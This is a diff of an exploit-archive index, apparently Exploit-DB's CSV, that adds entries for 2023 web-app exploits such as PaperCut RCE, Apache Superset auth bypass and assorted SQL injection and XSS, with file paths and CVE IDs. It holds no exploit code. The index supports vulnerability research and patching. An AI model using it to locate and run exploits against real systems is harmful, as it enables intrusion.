 50072,exploits/multiple/webapps/50072.py,"Apache Superset 1.1.0 - Time-Based Account Enumeration",2021-06-30,"Dolev Farhi",webapps,multiple,,2021-06-30,2021-06-30,0,,,,,,
+51447,exploits/multiple/webapps/51447.py,"Apache Superset 2.0.0 - Authentication Bypass",2023-05-23,MaanVader,webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-27524,,,,,
 48143,exploits/multiple/webapps/48143.py,"Apache Tomcat - AJP 'Ghostcat File Read/Inclusion",2020-02-20,YDHCUI,webapps,multiple,,2020-02-27,2020-03-02,0,CVE-2020-1938,,,,,https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/blob/8bd38f4cf22331ecf4e48096a78c5931509c26be/CNVD-2020-10487-Tomcat-Ajp-lfi.py
 49039,exploits/multiple/webapps/49039.rb,"Apache Tomcat - AJP 'Ghostcat' File Read/Inclusion (Metasploit)",2020-11-13,SunCSR,webapps,multiple,,2020-11-13,2020-11-13,1,CVE-2020-1938,,,,,
 10292,exploits/multiple/webapps/10292.txt,"Apache Tomcat 3.2.1 - 404 Error Page Cross-Site Scripting",2009-12-01,MustLive,webapps,multiple,,2009-11-30,2010-07-09,1,,,,,http://www.exploit-db.comjakarta-tomcat-3.2.1.tar.gz,
@@ -11757,6 +11768,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 33731,exploits/multiple/webapps/33731.txt,"Friendly Technologies TR-069 ACS 2.8.9 - Login SQL Injection",2010-03-10,"Yaniv Miron",webapps,multiple,,2010-03-10,2014-06-13,1,,,,,,https://www.securityfocus.com/bid/38634/info
 9720,exploits/multiple/webapps/9720.txt,"FSphp 0.2.1 - Multiple Remote File Inclusions",2009-09-18,NoGe,webapps,multiple,,2009-09-17,,1,OSVDB-58317;CVE-2009-3307;OSVDB-58316;OSVDB-58315,,,,,
 43442,exploits/multiple/webapps/43442.txt,"FTP Service < 1.2 - Multiple Vulnerabilities",2003-06-03,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00007,,,,,http://gulftech.org/advisories/FTP%20Service%20Multiple%20Vulnerabilities/7
+51480,exploits/multiple/webapps/51480.txt,"FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)",2023-05-23,"Andrea Intilangelo",webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-25439,,,,,
 50982,exploits/multiple/webapps/50982.txt,"Geonetwork 4.2.0 - XML External Entity (XXE)",2022-07-29,"Amel BOUZIANE-LEBLOND",webapps,multiple,,2022-07-29,2022-07-29,0,,,,,,
 37757,exploits/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XML External Entity",2015-08-12,"David Bloom",webapps,multiple,,2015-08-15,2017-11-02,0,OSVDB-125901,,,,,
 50181,exploits/multiple/webapps/50181.py,"GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated)",2021-08-05,"Amin Bohio",webapps,multiple,,2021-08-05,2021-08-05,0,,,,,,
@@ -12009,6 +12021,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43440,exploits/multiple/webapps/43440.txt,"P-Synch < 6.2.5 - Multiple Vulnerabilities",2003-05-30,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00005,,,,,http://gulftech.org/advisories/P-Synch%20Multiple%20Vulnerabilities/5
 51343,exploits/multiple/webapps/51343.txt,"Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)",2023-04-08,omurugur,webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2022-0020,,,,,
 51391,exploits/multiple/webapps/51391.py,"PaperCut NG/MG 22.0.4 - Authentication Bypass",2023-04-25,MaanVader,webapps,multiple,,2023-04-25,2023-04-25,0,CVE-2023-27350,,,,,
+51452,exploits/multiple/webapps/51452.py,"PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE)",2023-05-23,MaanVader,webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-27350,,,,,
 35210,exploits/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",webapps,multiple,,2014-11-10,2018-01-25,0,CVE-2014-8499;CVE-2014-8498;OSVDB-114485;OSVDB-114484;OSVDB-114483,,,,,https://github.com/pedrib/PoC/blob/a2842a650de88c582e963493d5e2711aa4a1b747/advisories/ManageEngine/me_pmp_privesc.txt
 50371,exploits/multiple/webapps/50371.txt,"Payara Micro Community 5.2021.6 - Directory Traversal",2021-10-04,"Yasser Khan",webapps,multiple,,2021-10-04,2021-10-04,0,CVE-2021-41381,,,,,
 51099,exploits/multiple/webapps/51099.txt,"Pega Platform 8.1.0 - Remote Code Execution (RCE)",2023-03-28,"Marcin Wolak",webapps,multiple,,2023-03-28,2023-03-28,0,CVE-2022-24082,,,,,
@@ -13523,6 +13536,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 6270,exploits/php/webapps/6270.txt,"Affiliate Directory - 'id' SQL Injection",2008-08-19,"Hussin X",webapps,php,,2008-08-18,2016-11-17,1,CVE-2008-3719;OSVDB-47557,,,,,
 5108,exploits/php/webapps/5108.txt,"Affiliate Market 0.1 Beta - 'Language' Local File Inclusion",2008-02-13,GoLd_M,webapps,php,,2008-02-12,2016-11-14,1,OSVDB-41787;CVE-2008-0794,,,,http://www.exploit-db.comaffmarket.30.03.07.zip,
 5114,exploits/php/webapps/5114.pl,"Affiliate Market 0.1 Beta - Cross-Site Scripting / SQL Injection",2008-02-14,"Khashayar Fereidani",webapps,php,,2008-02-13,2016-11-14,1,OSVDB-42852;CVE-2008-1177;OSVDB-42851;CVE-2008-1176,,,,http://www.exploit-db.comaffmarket.30.03.07.zip,
+51468,exploits/php/webapps/51468.txt,"Affiliate Me Version 5.0.1 - SQL Injection",2023-05-23,h4ck3r,webapps,php,,2023-05-23,2023-05-23,0,,,,,,
 43265,exploits/php/webapps/43265.txt,"Affiliate MLM Script 1.0 - 'product-category.php?key' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80,2017-12-09,2017-12-13,0,CVE-2017-17598,"SQL Injection (SQLi)",,,,
 42527,exploits/php/webapps/42527.txt,"Affiliate Niche Script 3.4.0 - SQL Injection",2017-08-21,"Ihsan Sencan",webapps,php,,2017-08-21,2017-08-21,0,,,,,,
 50678,exploits/php/webapps/50678.txt,"Affiliate Pro 1.7 - 'Multiple' Cross Site Scripting (XSS)",2022-01-19,Vulnerability-Lab,webapps,php,,2022-01-19,2022-01-19,0,,,,,,
@@ -14635,6 +14649,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 9472,exploits/php/webapps/9472.txt,"Best Dating Script - Arbitrary File Upload",2009-08-18,jetli007,webapps,php,,2009-08-17,,1,,,,,,
 51280,exploits/php/webapps/51280.txt,"Best pos Management System v1.0 - Remote Code Execution (RCE) on File Upload",2023-04-06,"Ahmed Ismail",webapps,php,,2023-04-06,2023-05-18,1,CVE-2023-0943,,,,,
 51279,exploits/php/webapps/51279.txt,"Best pos Management System v1.0 - SQL Injection",2023-04-06,"Ahmed Ismail",webapps,php,,2023-04-06,2023-04-06,0,,,,,,
+51462,exploits/php/webapps/51462.py,"Best POS Management System v1.0 - Unauthenticated Remote Code Execution",2023-05-23,"Mesut Cetin",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
 49122,exploits/php/webapps/49122.txt,"Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)",2020-11-27,Ex.Mi,webapps,php,,2020-11-27,2020-12-01,0,CVE-2020-24963,,,,,
 10655,exploits/php/webapps/10655.txt,"Best Top List - Cross-Site Scripting",2009-12-25,indoushka,webapps,php,,2009-12-24,,1,OSVDB-61372,,,,,
 10685,exploits/php/webapps/10685.txt,"Best Top List 2.11 - Arbitrary File Upload",2009-12-26,indoushka,webapps,php,,2009-12-25,,0,,,,,,
@@ -14862,6 +14877,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48942,exploits/php/webapps/48942.py,"Bludit 3.9.2 - Auth Bruteforce Bypass",2020-10-23,"Mayank Deshmukh",webapps,php,,2020-10-23,2020-11-13,1,CVE-2019-17240,,,,,
 49037,exploits/php/webapps/49037.rb,"Bludit 3.9.2 - Authentication Bruteforce Bypass (Metasploit)",2020-11-13,Aporlorxl23,webapps,php,,2020-11-13,2020-11-13,1,,,,,,
 51360,exploits/php/webapps/51360.txt,"Bludit 4.0.0-rc-2 - Account takeover",2023-04-14,nu11secur1ty,webapps,php,,2023-04-14,2023-04-14,0,,,,,,
+51476,exploits/php/webapps/51476.txt,"Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated)",2023-05-23,"Rahad Chowdhury",webapps,php,,2023-05-23,2023-05-23,0,CVE-2023-31698,,,,,
 46060,exploits/php/webapps/46060.txt,"bludit Pages Editor 3.0.0 - Arbitrary File Upload",2018-12-27,BouSalman,webapps,php,80,2018-12-27,2019-01-02,0,CVE-2018-1000811,,,,http://www.exploit-db.combludit-3.0.0.zip,
 11360,exploits/php/webapps/11360.txt,"Blue Dove - SQL Injection",2010-02-08,HackXBack,webapps,php,,2010-02-07,,0,,,,,,
 7797,exploits/php/webapps/7797.php,"Blue Eye CMS 1.0.0 - 'clanek' Blind SQL Injection",2009-01-15,darkjoker,webapps,php,,2009-01-14,2017-01-17,1,OSVDB-51769;CVE-2009-0425,,,,,
@@ -15501,6 +15517,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51319,exploits/php/webapps/51319.py,"ChurchCRM 4.5.1 - Authenticated SQL Injection",2023-04-07,Arvandy,webapps,php,,2023-04-07,2023-04-07,0,CVE-2023-24787,,,,,
 51397,exploits/php/webapps/51397.txt,"ChurchCRM v4.5.3 - Authenticated SQL Injection",2023-04-27,"Iyaad Luqman K",webapps,php,,2023-04-27,2023-05-07,1,CVE-2023-24685,,,,,
 51296,exploits/php/webapps/51296.txt,"ChurchCRM v4.5.3-121fcc1 - SQL Injection",2023-04-06,nu11secur1ty,webapps,php,,2023-04-06,2023-04-06,0,,,,,,
+51477,exploits/php/webapps/51477.txt,"ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)",2023-05-23,"Rahad Chowdhury",webapps,php,,2023-05-23,2023-05-23,0,CVE-2023-31699,,,,,
 15887,exploits/php/webapps/15887.txt,"ChurchInfo 1.2.12 - SQL Injection",2011-01-01,dun,webapps,php,,2011-01-01,2011-01-01,1,OSVDB-70253,,,,http://www.exploit-db.comchurchinfo-1.2.12.zip,
 36874,exploits/php/webapps/36874.txt,"Chyrp 2.1.1 - 'ajax.php' HTML Injection",2012-02-22,"High-Tech Bridge SA",webapps,php,,2012-02-22,2015-05-01,1,CVE-2012-1001;OSVDB-79456,,,,,https://www.securityfocus.com/bid/52115/info
 36875,exploits/php/webapps/36875.txt,"Chyrp 2.1.2 - '/includes/error.php?body' Cross-Site Scripting",2012-02-22,"High-Tech Bridge SA",webapps,php,,2012-02-22,2015-05-01,1,CVE-2012-1001;OSVDB-79455,,,,,https://www.securityfocus.com/bid/52117/info
@@ -15537,6 +15554,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47046,exploits/php/webapps/47046.txt,"CiuisCRM 1.6 - 'eventType' SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,php,80,2019-07-01,2019-07-03,0,,"SQL Injection (SQLi)",,,,
 11124,exploits/php/webapps/11124.txt,"CiviCRM 3.1 < Beta 5 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-13,h00die,webapps,php,,2010-01-12,,1,,,,,http://www.exploit-db.comcivicrm-3.1.beta1-standalone.tar.gz,
 35327,exploits/php/webapps/35327.txt,"CiviCRM 3.3.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"AutoSec Tools",webapps,php,,2011-02-08,2014-11-23,1,,,,,,https://www.securityfocus.com/bid/46275/info
+51478,exploits/php/webapps/51478.txt,"CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting)",2023-05-23,"Andrea Intilangelo",webapps,php,,2023-05-23,2023-05-23,0,CVE-2023-25440,,,,,
 34749,exploits/php/webapps/34749.txt,"CJ Dynamic Poll Pro 2.0 - 'admin_index.php' Cross-Site Scripting",2009-07-21,Moudi,webapps,php,,2009-07-21,2014-09-23,1,CVE-2009-3509;OSVDB-56181,,,,,https://www.securityfocus.com/bid/43498/info
 25623,exploits/php/webapps/25623.txt,"CJ Ultra Plus 1.0.3/1.0.4 - 'OUT.php' SQL Injection",2005-05-06,Kold,webapps,php,,2005-05-06,2016-12-22,1,CVE-2005-1506;OSVDB-16159,,,,,https://www.securityfocus.com/bid/13533/info
 6536,exploits/php/webapps/6536.pl,"CJ Ultra Plus 1.0.4 - Cookie SQL Injection",2008-09-22,-SmoG-,webapps,php,,2008-09-21,,1,OSVDB-48724;CVE-2008-4241,,,,,
@@ -17356,6 +17374,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 9235,exploits/php/webapps/9235.php,"e107 Plugin my_gallery 2.4.1 - 'readfile()' Local File Disclosure",2009-07-23,NoGe,webapps,php,,2009-07-22,,1,,,,,,
 8417,exploits/php/webapps/8417.txt,"e107 Plugin userjournals_menu - 'blog.id' SQL Injection",2009-04-13,boom3rang,webapps,php,,2009-04-12,,1,OSVDB-53641,,,,,
 7184,exploits/php/webapps/7184.txt,"e107 Plugin ZoGo-Shop 1.15.4 - 'product' SQL Injection",2008-11-22,NoGe,webapps,php,,2008-11-21,2017-01-03,1,OSVDB-50171;CVE-2008-6114,,,,,
+51449,exploits/php/webapps/51449.txt,"e107 v2.3.2 - Reflected XSS",2023-05-23,"Hubert Wojciechowski",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
 24138,exploits/php/webapps/24138.txt,"e107 Website System 0.5/0.6 - 'Log.php' HTML Injection",2004-05-21,Chinchilla,webapps,php,,2004-05-21,2013-01-15,1,CVE-2004-2028;OSVDB-6345,,,,,https://www.securityfocus.com/bid/10395/info
 22958,exploits/php/webapps/22958.txt,"e107 Website System 0.554 - HTML Injection",2003-07-25,"Pete Foster",webapps,php,,2003-07-25,2012-11-27,1,OSVDB-2305,,,,,https://www.securityfocus.com/bid/8279/info
 22956,exploits/php/webapps/22956.txt,"e107 Website System 0.555 - 'db.php' Information Disclosure",2003-07-24,"Artoor Petrovich",webapps,php,,2003-07-24,2012-11-27,1,OSVDB-3856,,,,,https://www.securityfocus.com/bid/8273/info
@@ -18255,7 +18274,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 12763,exploits/php/webapps/12763.txt,"File Share scriptFile share - SQL Injection",2010-05-27,MouDy-Dz,webapps,php,,2010-05-26,,0,,,,,,
 6040,exploits/php/webapps/6040.txt,"File Store PRO 3.2 - Multiple Blind SQL Injections",2008-07-11,"Nu Am Bani",webapps,php,,2008-07-10,2016-12-14,1,OSVDB-23864;CVE-2006-1278;OSVDB-23863,,,,http://www.exploit-db.comfilestore.zip,
 12617,exploits/php/webapps/12617.txt,"File Thingie 2.5.5 - File Security Bypass",2010-05-16,"Jeremiah Talamantes",webapps,php,,2010-05-15,2017-07-14,0,OSVDB-55934,,file_thingie_v255_Jeremiah.zip,,,
-51436,exploits/php/webapps/51436.py,"File Thingie 2.5.7 - Remote Code Execution (RCE)",2023-05-05,"Maurice Fielenbach (grimlockx)",webapps,php,,2023-05-05,2023-05-05,0,,,,,,
+51436,exploits/php/webapps/51436.py,"File Thingie 2.5.7 - Remote Code Execution (RCE)",2023-05-05,"Maurice Fielenbach",webapps,php,,2023-05-05,2023-05-23,0,,,,,,
 10689,exploits/php/webapps/10689.txt,"file upload Ar Version - Arbitrary File Upload",2009-12-26,indoushka,webapps,php,,2009-12-25,,0,,,,,,
 11450,exploits/php/webapps/11450.txt,"File Upload Manager 1.3 - Web Shell File Upload",2010-02-14,ROOT_EGY,webapps,php,,2010-02-13,2017-11-15,0,,,,,,
 30467,exploits/php/webapps/30467.txt,"File Uploader 1.1 - 'datei.php?config[root_ordner]' Remote File Inclusion",2007-08-09,Rizgar,webapps,php,,2007-08-09,2013-12-24,1,CVE-2007-4327;OSVDB-36425,,,,,https://www.securityfocus.com/bid/25253/info
@@ -18979,6 +18998,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49774,exploits/php/webapps/49774.py,"GetSimple CMS My SMTP Contact Plugin 1.1.1 - Cross-Site Request Forgery",2021-04-16,boku,webapps,php,,2021-04-16,2021-10-29,0,,,,,,
 49798,exploits/php/webapps/49798.py,"GetSimple CMS My SMTP Contact Plugin 1.1.2 - Persistent Cross-Site Scripting",2021-04-23,boku,webapps,php,,2021-04-23,2021-11-01,0,,,,,,
 48745,exploits/php/webapps/48745.txt,"GetSimple CMS Plugin Multi User 1.8.2 - Cross-Site Request Forgery (Add Admin)",2020-08-13,boku,webapps,php,,2020-08-13,2020-08-13,0,,,,,,
+51475,exploits/php/webapps/51475.py,"GetSimple CMS v3.3.16 - Remote Code Execution (RCE)",2023-05-23,"Youssef Muhammad",webapps,php,,2023-05-23,2023-05-23,0,CVE-2022-41544,,,,,
 4738,exploits/php/webapps/4738.txt,"gf-3xplorer 2.4 - Cross-Site Scripting / Local File Inclusion",2007-12-18,MhZ91,webapps,php,,2007-12-17,2016-10-20,1,OSVDB-44780;CVE-2007-6476;OSVDB-44779;CVE-2007-6475;OSVDB-41376;CVE-2007-6474;OSVDB-41375,,,,http://www.exploit-db.comGF-3XPLORER_2.4_.rar,
 645,exploits/php/webapps/645.pl,"GFHost PHP GMail - Remote Command Execution",2004-11-21,spabam,webapps,php,,2004-11-20,,1,OSVDB-11626,,,,,http://www.zone-h.org/advisories/read/id=4904
 25693,exploits/php/webapps/25693.txt,"GForge 3.x - Arbitrary Command Execution",2005-05-24,"Filippo Spike Morelli",webapps,php,,2005-05-24,2013-05-24,1,CVE-2005-1752;OSVDB-16930,,,,,https://www.securityfocus.com/bid/13716/info
@@ -22231,6 +22251,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 31528,exploits/php/webapps/31528.txt,"Le Forum - 'Fichier_Acceuil' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php,,2008-03-24,2014-02-10,1,,,,,,https://www.securityfocus.com/bid/28423/info
 5887,exploits/php/webapps/5887.pl,"LE.CMS 1.4 - Arbitrary File Upload",2008-06-21,t0pP8uZz,webapps,php,,2008-06-20,,1,OSVDB-46498;CVE-2008-2833,,,,,
 36647,exploits/php/webapps/36647.txt,"Lead Capture - 'login.php' Script Cross-Site Scripting",2012-01-21,HashoR,webapps,php,,2012-01-21,2015-04-06,1,CVE-2012-0932;OSVDB-78455,,,,,https://www.securityfocus.com/bid/51785/info
+51471,exploits/php/webapps/51471.txt,"LeadPro CRM v1.0 - SQL Injection",2023-05-23,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
 11889,exploits/php/webapps/11889.txt,"leaftec CMS - Multiple Vulnerabilities",2010-03-26,Valentin,webapps,php,,2010-03-25,,1,OSVDB-63417;OSVDB-63416,,,,,
 8576,exploits/php/webapps/8576.pl,"Leap CMS 0.1.4 - 'searchterm' Blind SQL Injection",2009-04-30,YEnH4ckEr,webapps,php,,2009-04-29,,1,OSVDB-54405;CVE-2009-1613,,,,,
 8577,exploits/php/webapps/8577.txt,"Leap CMS 0.1.4 - SQL Injection / Cross-Site Scripting / Arbitrary File Upload",2009-04-30,YEnH4ckEr,webapps,php,,2009-04-29,,1,OSVDB-54405;CVE-2009-1615;OSVDB-54404;CVE-2009-1614;OSVDB-54403;OSVDB-54402;CVE-2009-1613,,,,,
@@ -27727,6 +27748,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 8866,exploits/php/webapps/8866.php,"Podcast Generator 1.2 - Unauthorized Re-Installation",2009-06-03,StAkeR,webapps,php,,2009-06-02,2016-11-23,1,OSVDB-67403;OSVDB-67402;OSVDB-67401;OSVDB-67400;OSVDB-67399;OSVDB-67398;OSVDB-67397;OSVDB-67396;OSVDB-67395;OSVDB-67393;OSVDB-67392;OSVDB-67391;OSVDB-67390;OSVDB-67389;OSVDB-67388;OSVDB-67387;OSVDB-67386;OSVDB-55258;OSVDB-55257;OSVDB-55256,,,,http://www.exploit-db.compodcastgen1.2.zip,
 16109,exploits/php/webapps/16109.txt,"Podcast Generator 1.3 - Multiple Vulnerabilities",2011-02-04,"High-Tech Bridge SA",webapps,php,,2011-02-04,2016-11-14,1,,,,,http://www.exploit-db.compodcastgen1.3.zip,http://www.htbridge.ch/advisory/local_file_inclusion_in_podcast_generator.html
 49866,exploits/php/webapps/49866.txt,"Podcast Generator 3.1 - 'Long Description' Persistent Cross-Site Scripting (XSS)",2021-05-14,"Ayşenur KARAASLAN",webapps,php,,2021-05-14,2021-05-14,0,,,,,http://www.exploit-db.comPodcastGenerator-3.1.zip,
+51454,exploits/php/webapps/51454.txt,"PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS)",2023-05-23,"Mirabbas Ağalarov",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
 26414,exploits/php/webapps/26414.txt,"PodHawk 1.85 - Arbitrary File Upload",2013-06-24,"CWH Underground",webapps,php,,2013-06-24,2013-06-24,0,OSVDB-94549,,,,,
 11473,exploits/php/webapps/11473.txt,"Pogodny CMS - SQL Injection",2010-02-16,Ariko-Security,webapps,php,,2010-02-15,,1,OSVDB-62343;CVE-2010-0671,,,,,
 17141,exploits/php/webapps/17141.txt,"Point Market System 3.1x vBulletin plugin - SQL Injection",2011-04-10,Net.Edit0r,webapps,php,,2011-04-10,2011-04-10,0,,,,,http://www.exploit-db.comPointMarket3.1.0Alpha1.rar,
@@ -27992,6 +28014,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48347,exploits/php/webapps/48347.txt,"Prestashop 1.7.6.4 - Cross-Site Request Forgery",2020-04-20,"Sivanesh Ashok",webapps,php,,2020-04-20,2020-06-18,0,,,,,,
 49755,exploits/php/webapps/49755.py,"PrestaShop 1.7.6.7 - 'location' Blind Sql Injection",2021-04-09,"Vanshal Gaur",webapps,php,,2021-04-09,2021-04-09,0,CVE-2020-15160,,,,,
 49410,exploits/php/webapps/49410.txt,"Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection",2021-01-11,"Jaimin Gondaliya",webapps,php,,2021-01-11,2021-01-11,0,,,,,,
+51463,exploits/php/webapps/51463.txt,"Prestashop 8.0.4 - CSV injection",2023-05-23,"Mirabbas Ağalarov",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
 45046,exploits/php/webapps/45046.py,"PrestaShop < 1.6.1.19 - 'AES CBC' Privilege Escalation",2018-07-16,"Charles Fol",webapps,php,,2018-07-18,2018-07-18,0,CVE-2018-13784,,,,,https://github.com/ambionics/prestashop-exploits/blob/3bcb6af9954c03f269623c4752788f8de80602b9/prestashop_aes_cbc/prestashop_cbc_read.py
 45047,exploits/php/webapps/45047.txt,"PrestaShop < 1.6.1.19 - 'BlowFish ECD' Privilege Escalation",2018-07-16,"Charles Fol",webapps,php,,2018-07-18,2018-07-18,0,CVE-2018-13784,,,,,https://ambionics.io/blog/prestashop-privilege-escalation
 51001,exploits/php/webapps/51001.py,"Prestashop blockwishlist module 2.1.0 - SQLi",2022-08-09,"Karthik UJ",webapps,php,,2022-08-09,2022-08-09,0,CVE-2022-31101,,,,,
@@ -28341,6 +28364,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 11554,exploits/php/webapps/11554.txt,"QuickDev 4 PHP - Database Disclosure",2010-02-23,ViRuSMaN,webapps,php,,2010-02-22,,1,,,,,,
 5733,exploits/php/webapps/5733.txt,"QuickerSite 1.8.5 - Multiple Vulnerabilities",2008-06-03,BugReport.IR,webapps,php,,2008-06-02,,1,OSVDB-46738;CVE-2008-6678;OSVDB-46736;CVE-2008-6677;OSVDB-46228;CVE-2008-6676;OSVDB-46227;CVE-2008-6675;OSVDB-46226;OSVDB-46225;OSVDB-46224;OSVDB-46223;CVE-2008-6674;OSVDB-46222;CVE-2008-6673;OSVDB-46221;OSVDB-46220;OSVDB-46219,,,,,http://bugreport.ir/index.php?/39
 4193,exploits/php/webapps/4193.txt,"QuickEStore 8.2 - 'insertorder.cfm' SQL Injection",2007-07-18,meoconx,webapps,php,,2007-07-17,,1,OSVDB-36358;CVE-2007-3933,,,,,
+51474,exploits/php/webapps/51474.txt,"Quicklancer v1.0 - SQL Injection",2023-05-23,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
 26828,exploits/php/webapps/26828.txt,"QuickPayPro 3.1 - 'customer.tickets.view.php' Multiple SQL Injections",2005-12-14,r0t,webapps,php,,2005-12-14,2013-07-15,1,CVE-2005-4243;OSVDB-21677,,,,,https://www.securityfocus.com/bid/15863/info
 26830,exploits/php/webapps/26830.txt,"QuickPayPro 3.1 - 'design.php?delete' SQL Injection",2005-12-14,r0t,webapps,php,,2005-12-14,2013-07-15,1,CVE-2005-4243;OSVDB-21679,,,,,https://www.securityfocus.com/bid/15863/info
 26827,exploits/php/webapps/26827.txt,"QuickPayPro 3.1 - 'popups.edit.php?popupid' SQL Injection",2005-12-14,r0t,webapps,php,,2005-12-14,2013-07-15,1,CVE-2005-4243;OSVDB-21676,,,,,https://www.securityfocus.com/bid/15863/info
@@ -29489,6 +29513,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 35877,exploits/php/webapps/35877.txt,"Sitemagic CMS - 'SMTpl' Directory Traversal",2011-06-23,"Andrea Bocchetti",webapps,php,,2011-06-23,2015-01-23,1,,,,,,https://www.securityfocus.com/bid/48399/info
 35871,exploits/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 - 'SMExt' Cross-Site Scripting",2011-06-21,"Gjoko Krstic",webapps,php,,2011-06-21,2015-01-23,1,OSVDB-73201,,,,,https://www.securityfocus.com/bid/48355/info
 48788,exploits/php/webapps/48788.txt,"SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated)",2020-09-03,V1n1v131r4,webapps,php,,2020-09-03,2020-09-03,0,,,,,,
+51464,exploits/php/webapps/51464.txt,"SitemagicCMS 4.4.3 - Remote Code Execution (RCE)",2023-05-23,"Mirabbas Ağalarov",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
 44793,exploits/php/webapps/44793.txt,"Sitemakin SLAC 1.0 - 'my_item_search' SQL Injection",2018-05-29,"Divya Jain",webapps,php,,2018-05-29,2018-05-29,0,CVE-2018-11535,,,,,
 25052,exploits/php/webapps/25052.pl,"Siteman 1.1 - User Database Privilege Escalation (1)",2005-01-19,"Noam Rathaus",webapps,php,,2005-01-19,2013-04-28,1,CVE-2005-0305;OSVDB-13811,,,,,https://www.securityfocus.com/bid/12304/info
 25053,exploits/php/webapps/25053.html,"Siteman 1.1 - User Database Privilege Escalation (2)",2005-01-19,amironline452,webapps,php,,2005-01-19,2013-04-28,1,CVE-2005-0305;OSVDB-13811,,,,,https://www.securityfocus.com/bid/12304/info
@@ -29571,6 +29596,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 10437,exploits/php/webapps/10437.txt,"Smart PHP Subscriber - Multiple Disclosure Vulnerabilities",2009-12-14,"Milos Zivanovic",webapps,php,,2009-12-13,,1,CVE-2007-0518;OSVDB-32946,,,,,
 10727,exploits/php/webapps/10727.txt,"Smart PHP Uploader 1.0 - Arbitrary File Upload",2009-12-27,Phenom,webapps,php,,2009-12-26,,1,,,,,http://www.exploit-db.comphpuploader.zip,
 5003,exploits/php/webapps/5003.txt,"Smart Publisher 1.0.1 - 'filedata' Remote Code Execution",2008-01-29,GoLd_M,webapps,php,,2008-01-28,2016-11-14,1,OSVDB-40780;CVE-2008-0503,,,,http://www.exploit-db.comsmart-publisher-1.0.1.zip,
+51472,exploits/php/webapps/51472.txt,"Smart School v1.0 - SQL Injection",2023-05-23,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
 45049,exploits/php/webapps/45049.txt,"Smart SMS & Email Manager 3.3 - 'contact_type_id' SQL Injection",2018-07-18,AkkuS,webapps,php,80,2018-07-18,2018-07-18,0,,"SQL Injection (SQLi)",,,,
 34067,exploits/php/webapps/34067.txt,"Smart Statistics 1.0 - 'smart_Statistics_admin.php' Cross-Site Scripting",2010-01-10,R3d-D3V!L,webapps,php,,2010-01-10,2014-07-15,1,,,,,,https://www.securityfocus.com/bid/40468/info
 10977,exploits/php/webapps/10977.txt,"Smart Vision Script News - 'newsdetail.php' SQL Injection (1)",2010-01-03,Err0R,webapps,php,,2010-01-02,,1,,,,,,
@@ -29972,6 +29998,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 24227,exploits/php/webapps/24227.txt,"SqWebMail 4.0.4.20040524 - Email Header HTML Injection",2004-06-21,"Luca Legato",webapps,php,,2004-06-21,2013-01-19,1,CVE-2004-0591;OSVDB-7214,,,,,https://www.securityfocus.com/bid/10588/info
 26200,exploits/php/webapps/26200.txt,"SqWebMail 5.0.4 - HTML Email IMG Tag Script Injection",2005-08-29,"Jakob Balle",webapps,php,,2005-08-29,2013-06-14,1,CVE-2005-2769;OSVDB-19047,,,,,https://www.securityfocus.com/bid/14676/info
 8636,exploits/php/webapps/8636.txt,"ST-Gallery 0.1a - Multiple SQL Injections",2009-05-07,YEnH4ckEr,webapps,php,,2009-05-06,,1,OSVDB-54793;CVE-2009-1799,,,,,
+51473,exploits/php/webapps/51473.txt,"Stackposts Social Marketing Tool v1.0 - SQL Injection",2023-05-23,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
